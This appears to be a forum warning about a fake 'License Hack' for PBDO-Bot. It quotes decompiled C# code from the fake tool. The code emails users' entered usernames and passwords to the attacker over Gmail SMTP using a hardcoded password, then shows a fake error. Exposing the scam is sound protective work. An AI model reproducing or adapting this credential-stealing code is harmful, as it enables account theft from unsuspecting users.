kalai please dont create to stupid programs!:pimp:Quote:
It has come to my attention someone posing to be GnomeProgramming is distributing a fake "License Hack".
He sends a message like:
Please DO NOT download this, it is a program designed to steal PBDO license details. Want proof? Look here:
What that does is emails him your username and password! Btw, don't try accessing that account used to send the emails, the password was changed 13 days ago.Code:private void Button1_Click(object sender, EventArgs e) { MailMessage mailMessage = new MailMessage(); try { mailMessage.From = new MailAddress("[Only registered and activated users can see links. Click Here To Register...]"); mailMessage.To.Add("[Only registered and activated users can see links. Click Here To Register...]"); mailMessage.Subject = "PBDO-Bot Account"; mailMessage.Body = this.TextBox1.Text + this.TextBox4.Text + this.TextBox2.Text; new SmtpClient("smtp.gmail.com") { Port = 587, EnableSsl = true, Credentials = new NetworkCredential("[Only registered and activated users can see links. Click Here To Register...]", "55555555kK") }.Send(mailMessage); Thread.Sleep(99999999); Thread.Sleep(99999999); Thread.Sleep(99999999); Thread.Sleep(99999999); Interaction.MsgBox("Function: 'GetINFO' unavalible. Please try again", MsgBoxStyle.OkOnly, "Fatal Error"); this.Close(); } catch (Exception expr_E6) { ProjectData.SetProjectError(expr_E6); ProjectData.ClearProjectError(); } }
Please beware~!
v5devs